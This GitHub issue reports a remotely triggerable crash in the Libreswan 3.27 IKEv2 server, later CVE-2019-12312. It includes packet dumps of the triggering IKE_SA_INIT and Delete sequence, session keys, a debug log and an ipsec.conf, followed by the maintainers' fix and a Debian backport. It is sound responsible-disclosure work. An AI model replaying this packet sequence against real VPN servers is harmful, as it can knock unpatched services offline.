Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

NULL pointer dereference and pluto daemon restart in Libreswan 3.27 #246

Closed
GuoJiaXing-Lab124 opened this issue May 12, 2019 · 9 comments

Comments

Projects
None yet
3 participants
@GuoJiaXing-Lab124
Copy link

commented May 12, 2019

Hello, I triggered a vulnerability while testing the Libreswan 3.27 IKEv2 server.

The pluto IKE daemon will restart (due to NULL pointer dereference when built with NSS) by sending two IKEv2 packets which are init_IKE and delete_IKE in 3des_cbc mode to Libreswan server.

A detailed interactive process is as follows:

First, send the first init_IKE message to the server.

The server replies the init_IKE message to the client.

Then send a delete_IKE message (encrypted) to the server.

The server tries to respond INVALID_IKE_SPI to the client, but an exception occurred while preparing to encrypt the message.

#### detailed packets
# The first packet(I: init_IKE)
###[ IP ]### 
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 416
     id        = 1
     flags     = 
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0xa778
     src       = 192.168.40.1
     dst       = 192.168.40.130
     \options   \
###[ UDP ]### 
        sport     = isakmp
        dport     = isakmp
        len       = 396
        chksum    = 0x3708
###[ IKEv2 ]### 
           init_SPI  = '4\xba;\xf6\xd8\x8c\x17\xef'
           resp_SPI  = ''
           next_payload= SA
           version   = 0x20
           exch_type = IKE_SA_INIT
           flags     = Initiator
           id        = 0
           length    = 388
###[ IKEv2 SA ]### 
              next_payload= KE
              res       = 0
              length    = 44
              \prop      \
               |###[ IKEv2 Proposal ]### 
               |  next_payload= last
               |  res       = 0
               |  length    = 40
               |  proposal  = 1
               |  proto     = IKEv2
               |  SPIsize   = 0
               |  trans_nb  = 4
               |  SPI       = ''
               |  \trans     \
               |   |###[ IKE Transform ]### 
               |   |  next_payload= Transform
               |   |  res       = 0
               |   |  length    = 8
               |   |  transform_type= Encryption
               |   |  res2      = 0
               |   |  transform_id= 3DES
               |   |###[ IKE Transform ]### 
               |   |     next_payload= Transform
               |   |     res       = 0
               |   |     length    = 8
               |   |     transform_type= Integrity
               |   |     res2      = 0
               |   |     transform_id= HMAC-SHA1-96
               |   |###[ IKE Transform ]### 
               |   |        next_payload= Transform
               |   |        res       = 0
               |   |        length    = 8
               |   |        transform_type= PRF
               |   |        res2      = 0
               |   |        transform_id= PRF_HMAC_SHA1
               |   |###[ IKE Transform ]### 
               |   |           next_payload= last
               |   |           res       = 0
               |   |           length    = 8
               |   |           transform_type= GroupDesc
               |   |           res2      = 0
               |   |           transform_id= 1024MODPgr
###[ IKEv2 Key Exchange ]### 
                 next_payload= Nonce
                 res       = 0
                 length    = 136
                 group     = 1024MODPgr
                 res2      = 0
                 load      = '(\xe9\xaa\xaa\x91\xf1\x1d)\xd9\x1c\x9c\xeb\xcab\x90\xd8\x8fZ\x19\xad\x15\x80\xfe\x16\xde\x06j\x93\t\x92\xcay\x0f^}\x16\x11\xdc\xab\xd3\x0f\xf6ciA\xfe\t\x8del\xd4D\x04\x00\x87v\\Q\xa7\x83t\xc4u\x18\xe6\xb1\xdcV\xbb\x00u}?\x8dz\x90\xef\xe9gb\xf3uJr\x8ed\xae\xcf:\x85\xe5\xdf\xda\xdc1\xc3\x95K\x8e\x82\x84\x96\x0b\xea_N\xe5\x8bB\xdf\x9c\\\xa4\x1a\xbd\xf4B\x07\x1a\x0c\xfd)\xb9.4y\x1d\xa1'
###[ IKEv2 Nonce ]### 
                    next_payload= Notify
                    res       = 0
                    length    = 36
                    load      = '\x9al/\xbe\x01\x1f\xdc\xdc\x8b\xa4O\xd7k\xdf\x96^9\xcbmx\xcf\xe8\xc4\xa4$x\x8a\r\xbb%\xa6\xb2'
###[ IKEv2 Notify ]### 
                       next_payload= Notify
                       res       = 0
                       length    = 28
                       proto     = Reserved
                       SPIsize   = 0
                       type      = NAT_DETECTION_SOURCE_IP
                       SPI       = ''
                       load      = '\x13\xfa\x01\xe7<\xe4\x93T\xb6\xec\x88\x1d\xeaS\x13O\xad2\x86 '
###[ IKEv2 Notify ]### 
                          next_payload= VendorID
                          res       = 0
                          length    = 28
                          proto     = Reserved
                          SPIsize   = 0
                          type      = NAT_DETECTION_DESTINATION_IP
                          SPI       = ''
                          load      = '\xde\xb7\xf8\x91\xddX(\xe6\x89\xc3\xc1l\xae\x9a\x07\xb8o\xb4\x13\xc3'
###[ IKEv2 Vendor ID ]### 
                             next_payload= VendorID
                             res       = 0
                             length    = 24
                             vendorID  = '\x1e+Qi\x05\x99\x1c}|\x96\xfc\xbf\xb5\x87\xe4a\x00\x00\x00\t'
###[ IKEv2 Vendor ID ]### 
                                next_payload= VendorID
                                res       = 0
                                length    = 20
                                vendorID  = '\xfb\x1d\xe3\xcd\xf3A\xb7\xea\x16\xb7\xe5\xbe\x08U\xf1 '
###[ IKEv2 Vendor ID ]### 
                                   next_payload= VendorID
                                   res       = 0
                                   length    = 20
                                   vendorID  = '&$M8\xed\xdba\xb3\x17*6\xe3\xd0\xcf\xb8\x19'
###[ IKEv2 Vendor ID ]### 
                                      next_payload= None
                                      res       = 0
                                      length    = 24
                                      vendorID  = '\x01R\x8b\xbb\xc0\x06\x96\x12\x18I\xab\x9a\x1c[*Q\x00\x00\x00\x02'
               
# The second packet(R: init_IKE)
###[ IP ]### 
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 361
     id        = 31815
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0xeb68
     src       = 192.168.40.130
     dst       = 192.168.40.1
     \options   \
###[ UDP ]### 
        sport     = isakmp
        dport     = isakmp
        len       = 341
        chksum    = 0xd236
###[ IKEv2 ]### 
           init_SPI  = '4\xba;\xf6\xd8\x8c\x17\xef'
           resp_SPI  = '\xc6\xe1\x11i\x1d^\x18D'
           next_payload= SA
           version   = 0x20
           exch_type = IKE_SA_INIT
           flags     = Response
           id        = 0
           length    = 333
###[ IKEv2 SA ]### 
              next_payload= KE
              res       = 0
              length    = 44
              \prop      \
               |###[ IKEv2 Proposal ]### 
               |  next_payload= last
               |  res       = 0
               |  length    = 40
               |  proposal  = 1
               |  proto     = IKEv2
               |  SPIsize   = 0
               |  trans_nb  = 4
               |  SPI       = ''
               |  \trans     \
               |   |###[ IKE Transform ]### 
               |   |  next_payload= Transform
               |   |  res       = 0
               |   |  length    = 8
               |   |  transform_type= Encryption
               |   |  res2      = 0
               |   |  transform_id= 3DES
               |   |###[ IKE Transform ]### 
               |   |     next_payload= Transform
               |   |     res       = 0
               |   |     length    = 8
               |   |     transform_type= PRF
               |   |     res2      = 0
               |   |     transform_id= PRF_HMAC_SHA1
               |   |###[ IKE Transform ]### 
               |   |        next_payload= Transform
               |   |        res       = 0
               |   |        length    = 8
               |   |        transform_type= Integrity
               |   |        res2      = 0
               |   |        transform_id= HMAC-SHA1-96
               |   |###[ IKE Transform ]### 
               |   |           next_payload= last
               |   |           res       = 0
               |   |           length    = 8
               |   |           transform_type= GroupDesc
               |   |           res2      = 0
               |   |           transform_id= 1024MODPgr
###[ IKEv2 Key Exchange ]### 
                 next_payload= Nonce
                 res       = 0
                 length    = 136
                 group     = 1024MODPgr
                 res2      = 0
                 load      = '\x7f\x9b\x1aHlx\xdd\x86\xaa\xcf\x8e\xcd\x14\x9dU\x1e\x9c\x96\x99\xe6\x16\xc6\xce\xc8.&\xe5\x0e\x16\x8cfr\xfc\x8c\xc60\x83k\x8dF\x1a\xd5s\x8a^\xa5\x85\xcd\x86-\xde\x97\x98\xedc\x17\xb8\xf84!\x15\xf0\x11(D?\xd9\xa3\xc2\x80\xd6\xd6\x92R\xe2\t\xcb\xa2D{\x13g\xb7\x99\xa4\xa7\xd4\x8b\x0c\xf7\xb8\xbd\xa0]\x87\xd0\xa1\xa6~Nf\x9d\x98\x9f\x89\x94\xe5V\xed%\x0f&\x8cT\xe6\xa0\x05Uuyk\xe1w\xd82]A\xfa'
###[ IKEv2 Nonce ]### 
                    next_payload= Notify
                    res       = 0
                    length    = 36
                    load      = '\xe9\xc3c\x8a\xa7\xa9_\x8d\xf3\x15\xbc7\xaa\xd8\x8b\xd4\x93\x16\xb7\x10\xe0w\xc0\x10IY\xc1s\xf2<+k'
###[ IKEv2 Notify ]### 
                       next_payload= Notify
                       res       = 0
                       length    = 8
                       proto     = Reserved
                       SPIsize   = 0
                       type      = IKEV2_FRAGMENTATION_SUPPORTED
                       SPI       = ''
                       load      = ''
###[ IKEv2 Notify ]### 
                          next_payload= Notify
                          res       = 0
                          length    = 28
                          proto     = Reserved
                          SPIsize   = 0
                          type      = NAT_DETECTION_SOURCE_IP
                          SPI       = ''
                          load      = 's\x9a\xd1\xecQ\xc4L\xdfy^\xa5\xb9\x9b\xa4\r\xde\x0c\x13;\xdc'
###[ IKEv2 Notify ]### 
                             next_payload= CERTREQ
                             res       = 0
                             length    = 28
                             proto     = Reserved
                             SPIsize   = 0
                             type      = NAT_DETECTION_DESTINATION_IP
                             SPI       = ''
                             load      = "\x91\n%J\x85\xb0\xec\xads\xf42\x8b1\x98\x7f\xff'\xcb\xa6\xfe"
###[ IKEv2 Payload ]### 
                                next_payload= None
                                flags     = 
                                length    = 25
                                load      = '\x04\xa40\xb5\xee\xedr\x07\xa7\xbf\xe1L<]\x95\x19\xde\xeeys\xd9'
                
# The third packet(I: delete_IKE)
###[ IP ]### 
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 100
     id        = 1
     flags     = 
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0xa8b4
     src       = 192.168.40.1
     dst       = 192.168.40.130
     \options   \
###[ UDP ]### 
        sport     = 4500
        dport     = 4500
        len       = 80
        chksum    = 0xafe4
        data      = 0x00000000
###[ IKEv2 ]### 
  init_SPI  = '4\xba;\xf6\xd8\x8c\x17\xef'
  resp_SPI  = '\xc6\xe1\x11i\x1d^\x18D'
  next_payload= Encrypted
  version   = 0x20
  exch_type = INFORMATIONAL
  flags     = Initiator
  id        = 1
  length    = 68
###[ IKEv2 Encrypted and Authenticated ]### 
     next_payload= Delete
     res       = 0
     length    = 40
     load      = '=!\x87\x9c@\x0eX\xe5\xa1\xdf\xc6\xc9\xa2&\xf8\xf5\xc7\x0fSu\xd7\xa0\xdf\xc4nZ\x1a\x99U\x02Y_\xad\xc5UA'

        
# *************** # 
# Decrypted message        
###[ IKEv2 Delete ]### 
  next_payload= None
  res       = 0
  length    = 8
  vendorID  = '\x01\x00\x00\x00'
# *************** # 
        
# relecant parameters
spi_i
0x34\0xba\0x3b\0xf6\0xd8\0x8c\0x17\0xef
spi_r
0xc6\0xe1\0x11\0x69\0x1d\0x5e\0x18\0x44
sk_ai
0xa7\0xcb\0x4f\0x50\0xe9\0xb5\0x61\0x8f\0x04\0xc4\0xaa\0x0f\0x58\0x93\0x98\0xd3\0xfd\0xb6\0xdb\0xdb
sk_ar
0x89\0x2c\0xd0\0x3a\0x4e\0xb1\0xeb\0x19\0xf7\0x04\0xc1\0xc1\0x6f\0x64\0x08\0x5d\0x4b\0xef\0x8d\0x34
sk_ei
0xe9\0x4a\0x94\0x4d\0x2e\0xfb\0x8b\0x8e\0x86\0xb9\0xd6\0x18\0xfb\0xcd\0x53\0xdd\0xd8\0x35\0x60\0xba\0xc8\0xbb\0x71\0x46
sk_er
0x7a\0x4d\0x3d\0xb3\0x4d\0x72\0x7e\0x25\0xa4\0xc5\0x4a\0xb1\0x93\0x9d\0x9f\0x51\0x17\0x44\0x86\0x3e\0x51\0xe0\0x39\0x22

       
Relevant log
May  7 16:32:32.868480: | state #1 requesting EVENT_CRYPTO_TIMEOUT to be deleted
May  7 16:32:32.868496: | free_event_entry: release EVENT_CRYPTO_TIMEOUT-pe@0x55f4dc4630f8
May  7 16:32:32.868501: | event_schedule: new EVENT_v2_RESPONDER_TIMEOUT-pe@0x55f4dc4630f8
May  7 16:32:32.868506: | inserting event EVENT_v2_RESPONDER_TIMEOUT, timeout in 200.000 seconds for #1
May  7 16:32:32.868515: | processing: stop state #1 connection "ikev2-cp"[1] 192.168.40.1 192.168.40.1:500 (in schedule_event_now_cb() at server.c:561)
May  7 16:32:32.868519: | serialno table: hash serialno #0 to head 0x55f4db2fb4e0
May  7 16:32:32.868522: | serialno table: hash serialno #0 to head 0x55f4db2fb4e0
May  7 16:32:32.883707: | *received 68 bytes from 192.168.40.1:4500 on ens33 (port=4500)
May  7 16:32:32.883740: |   34 ba 3b f6  d8 8c 17 ef  c6 e1 11 69  1d 5e 18 44
May  7 16:32:32.883743: |   2e 20 25 08  00 00 00 01  00 00 00 44  2a 00 00 28
May  7 16:32:32.883745: |   3d 21 87 9c  40 0e 58 e5  a1 df c6 c9  a2 26 f8 f5
May  7 16:32:32.883766: |   c7 0f 53 75  d7 a0 df c4  6e 5a 1a 99  55 02 59 5f
May  7 16:32:32.883769: |   ad c5 55 41
May  7 16:32:32.883773: | processing: start from 192.168.40.1:4500 (in process_md() at demux.c:391)
May  7 16:32:32.883778: | **parse ISAKMP Message:
May  7 16:32:32.883780: |    initiator cookie:
May  7 16:32:32.883782: |   34 ba 3b f6  d8 8c 17 ef
May  7 16:32:32.883785: |    responder cookie:
May  7 16:32:32.883786: |   c6 e1 11 69  1d 5e 18 44
May  7 16:32:32.883789: |    next payload type: ISAKMP_NEXT_v2SK (0x2e)
May  7 16:32:32.883792: |    ISAKMP version: IKEv2 version 2.0 (rfc4306/rfc5996) (0x20)
May  7 16:32:32.883794: |    exchange type: ISAKMP_v2_INFORMATIONAL (0x25)
May  7 16:32:32.883796: |    flags: ISAKMP_FLAG_v2_IKE_INIT (0x8)
May  7 16:32:32.883799: |    message ID:  00 00 00 01
May  7 16:32:32.883801: |    length: 68 (0x44)
May  7 16:32:32.883804: |  processing version=2.0 packet with exchange type=ISAKMP_v2_INFORMATIONAL (37)
May  7 16:32:32.883806: | I am receiving an IKEv2 Request ISAKMP_v2_INFORMATIONAL
May  7 16:32:32.883808: | I am the IKE SA Original Responder
May  7 16:32:32.883814: | cookies table: hash icookie 34 ba 3b f6  d8 8c 17 ef rcookie c6 e1 11 69  1d 5e 18 44 to 3873113480610546027 slot 0x55f4db2f6b40
May  7 16:32:32.883817: | parent v2 peer and cookies match on #1
May  7 16:32:32.883820: | v2 state object #1 found, in STATE_PARENT_R1
May  7 16:32:32.883825: | processing: start state #1 connection "ikev2-cp"[1] 192.168.40.1 192.168.40.1:500 (in processed_retransmit() at ikev2.c:1182)
May  7 16:32:32.883827: | found state #1
May  7 16:32:32.883831: | processing: [RE]START state #1 connection "ikev2-cp"[1] 192.168.40.1 192.168.40.1:500 (in ikev2_process_packet() at ikev2.c:1552)
May  7 16:32:32.883834: | processing: start connection "ikev2-cp"[1] 192.168.40.1 (BACKGROUND) (in ikev2_process_packet() at ikev2.c:1557)
May  7 16:32:32.883837: | #1 is idle
May  7 16:32:32.883839: | #1 idle
May  7 16:32:32.883841: | #1 in state PARENT_R1: received v2I1, sent v2R1
May  7 16:32:32.883844: | selected state microcode roof
May  7 16:32:32.883846: | no useful state microcode entry found
May  7 16:32:32.883850: "ikev2-cp"[1] 192.168.40.1 #1: responding to INFORMATIONAL message (ID 1) from 192.168.40.1:500 with encrypted notification INVALID_IKE_SPI
May  7 16:32:32.883853: | Opening output PBS encrypted notification
May  7 16:32:32.883856: | **emit ISAKMP Message:
May  7 16:32:32.883858: |    initiator cookie:
May  7 16:32:32.883860: |   34 ba 3b f6  d8 8c 17 ef
May  7 16:32:32.883862: |    responder cookie:
May  7 16:32:32.883864: |   c6 e1 11 69  1d 5e 18 44
May  7 16:32:32.883866: |    next payload type: ISAKMP_NEXT_NONE (0x0)
May  7 16:32:32.883869: |    ISAKMP version: IKEv2 version 2.0 (rfc4306/rfc5996) (0x20)
May  7 16:32:32.883871: |    exchange type: ISAKMP_v2_INFORMATIONAL (0x25)
May  7 16:32:32.883873: |    flags: ISAKMP_FLAG_v2_MSG_RESPONSE (0x20)
May  7 16:32:32.883875: |    message ID:  00 00 00 01
May  7 16:32:32.883878: | next payload type: saving message location 'ISAKMP Message'.'next payload type'
May  7 16:32:32.883881: | next payload type: setting 'ISAKMP Message'.'next payload type' to IKEv2 Encryption Payload (46:ISAKMP_NEXT_v2SK)
May  7 16:32:32.883884: | ***emit IKEv2 Encryption Payload:
May  7 16:32:32.883886: |    next payload type: ISAKMP_NEXT_v2NONE (0x0)
May  7 16:32:32.883888: |    flags: none (0x0)
May  7 16:32:32.883890: | next payload type: saving message location 'IKEv2 Encryption Payload'.'next payload type'
May  7 16:32:32.883901: | emitting 8 raw bytes of IV into IKEv2 Encryption Payload
May  7 16:32:32.883904: | IV  d1 f5 3d d9  f2 04 95 d2
May  7 16:32:32.883906: | Adding a v2N Payload
May  7 16:32:32.883909: | next payload type: setting 'IKEv2 Encryption Payload'.'next payload type' to IKEv2 Notify Payload (41:ISAKMP_NEXT_v2N)
May  7 16:32:32.883911: | ****emit IKEv2 Notify Payload:
May  7 16:32:32.883913: |    next payload type: ISAKMP_NEXT_v2NONE (0x0)
May  7 16:32:32.883915: |    flags: none (0x0)
May  7 16:32:32.883918: |    Protocol ID: PROTO_v2_RESERVED (0x0)
May  7 16:32:32.883926: |    SPI size: 0 (0x0)
May  7 16:32:32.883929: |    Notify Message Type: v2N_INVALID_IKE_SPI (0x4)
May  7 16:32:32.883931: | next payload type: saving payload location 'IKEv2 Notify Payload'.'next payload type'
May  7 16:32:32.883944: | emitting length of IKEv2 Notify Payload: 8
May  7 16:32:32.883947: | adding 8 bytes of padding (including 1 byte padding-length)
May  7 16:32:32.883949: | emitting 8 raw bytes of padding and length into IKEv2 Encryption Payload
May  7 16:32:32.883952: | padding and length  00 01 02 03  04 05 06 07
May  7 16:32:32.883955: | emitting 12 zero bytes of length of truncated HMAC/KEY into IKEv2 Encryption Payload
May  7 16:32:32.883966: | emitting length of IKEv2 Encryption Payload: 40
May  7 16:32:32.883969: | emitting length of ISAKMP Message: 68
May  7 16:32:32.883972: | construct_enc_iv: encryption IV/starting-variable: salt-size=0 wire-IV-size=8 block-size 8
May  7 16:32:32.883974: | construct_enc_iv: encryption IV/starting-variable: computed counter-size=0
May  7 16:32:32.883976: | encryption IV/starting-variable
May  7 16:32:32.883978: |   d1 f5 3d d9  f2 04 95 d2
May  7 16:32:32.883980: | data before encryption:
May  7 16:32:32.883982: |   00 00 00 08  00 00 00 04  00 01 02 03  04 05 06 07
May  7 16:32:32.883985: | NSS ike_alg_nss_cbc: 3des_cbc - enter
May  7 16:32:32.883988: "ikev2-cp"[1] 192.168.40.1 #1: ABORT: ASSERTION FAILED: 3des_cbc - NSS derived enc key in NULL (in ike_alg_nss_cbc() at ike_alg_encrypt_nss_cbc_ops.c:41)
My ipsec.conf
version 2.0

config setup
  virtual-private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/12,%v4:!192.168.42.0/24,%v4:!192.168.43.0/24
  protostack=netkey
  interfaces=%defaultroute
  uniqueids=no
  plutodebug="all crypt"
  plutostderrlog=/var/log/libreswan.log

conn ikev2-cp
  left=%defaultroute
  leftcert=192.168.40.130
  leftid=@192.168.40.130
  leftsendcert=always
  leftsubnet=0.0.0.0/0
  leftrsasigkey=%cert
  right=%any
  rightid=%fromcert
  # rightaddresspool=192.168.43.10-192.168.43.250
  rightaddresspool=10.31.2.0-10.31.3.254
  rightca=%same
  rightrsasigkey=%cert
  narrowing=yes
  dpddelay=30
  dpdtimeout=120
  dpdaction=clear
  auto=add
  ikev2=insist
  rekey=yes
  pfs=no
  ike-frag=yes
  ike=3des-sha1;modp1024,aes256-sha2,aes128-sha2,aes256-sha1,aes128-sha1,aes256-sha2;modp1024,aes128-sha1;modp1024
  phase2alg=3des-sha1;modp1024,aes_gcm-null,aes128-sha1,aes256-sha1,aes128-sha2,aes256-sha2
  modecfgdns="8.8.8.8 8.8.4.4"
  encapsulation=yes
  mobike=no

conn shared
  left=%defaultroute
  leftid=218.28.144.36
  right=%any
  encapsulation=yes
  authby=secret
  pfs=no
  rekey=no
  keyingtries=5
  dpddelay=30
  dpdtimeout=120
  dpdaction=clear
  ike=aes256-sha2,aes128-sha2,aes256-sha1,aes128-sha1,aes256-sha2;modp1024,aes128-sha1;modp1024
  phase2alg=aes_gcm-null,aes128-sha1,aes256-sha1,aes256-sha2_512,aes128-sha2,aes256-sha2
  sha2-truncbug=yes


conn l2tp-psk
  auto=add
  leftprotoport=17/1701
  rightprotoport=17/%any
  type=transport
  phase2=esp
  also=shared


conn xauth-psk
  auto=add
  leftsubnet=0.0.0.0/0
  rightaddresspool=192.168.43.10-192.168.43.250
  modecfgdns="8.8.8.8 8.8.4.4"
  leftxauthserver=yes
  rightxauthclient=yes
  leftmodecfgserver=yes
  rightmodecfgclient=yes
  modecfgpull=yes
  xauthby=file
  ike-frag=yes
  ikev2=never
  cisco-unity=yes
  also=shared
  ike=3des-sha1;modp1024,aes256-sha2,aes128-sha2,aes256-sha1,aes128-sha1,aes256-sha2;modp1024,aes128-sha1;modp1024
  phase2alg=aes_gcm-null,aes128-sha1,aes256-sha1,aes128-sha2,aes256-sha2

Looking forward to your reply, thank you.

libreswan pushed a commit that referenced this issue May 15, 2019

IKEv2: Do not attempt to encrypt a reply without established IKE SA
This is #246

Signed-off-by: D. Hugh Redelmeier <hugh@mimosa.com>
@letoams

This comment has been minimized.

Copy link
Collaborator

commented May 15, 2019

Hi,we pushed a fix for this in commit 7142d2c

Would you be able to test this for us?

@letoams

This comment has been minimized.

Copy link
Collaborator

commented May 17, 2019

note an updated fix was pushed, including a test case to reproduce this. will be in 3.28

libreswan pushed a commit that referenced this issue May 17, 2019

@letoams

This comment has been minimized.

Copy link
Collaborator

commented May 27, 2019

fixed and released in 3.28. Thanks for the report!

@letoams letoams closed this May 27, 2019

@dkg

This comment has been minimized.

Copy link
Contributor

commented Jun 3, 2019

btw, this seems to be CVE-2019-12312

@letoams

This comment has been minimized.

Copy link
Collaborator

commented Jun 3, 2019

@dkg

This comment has been minimized.

Copy link
Contributor

commented Jun 3, 2019

note an updated fix was pushed, including a test case to reproduce this. will be in 3.28

Which of the fixes are needed beyond 7142d2c? I've backported 7142d2c to 3.27 (see this patch), but i am concerned that there is some other subtle fix that i've missed.

@letoams

This comment has been minimized.

Copy link
Collaborator

commented Jun 3, 2019

A patch along with the libreswan response to the CVE submitted will be published at https://libreswan.org/security/CVE-2019-12312/ shortly

@dkg

This comment has been minimized.

Copy link
Contributor

commented Jun 3, 2019

I've uploaded 3.27-5 to debian with this patch

@letoams

This comment has been minimized.

Copy link
Collaborator

commented Jun 4, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.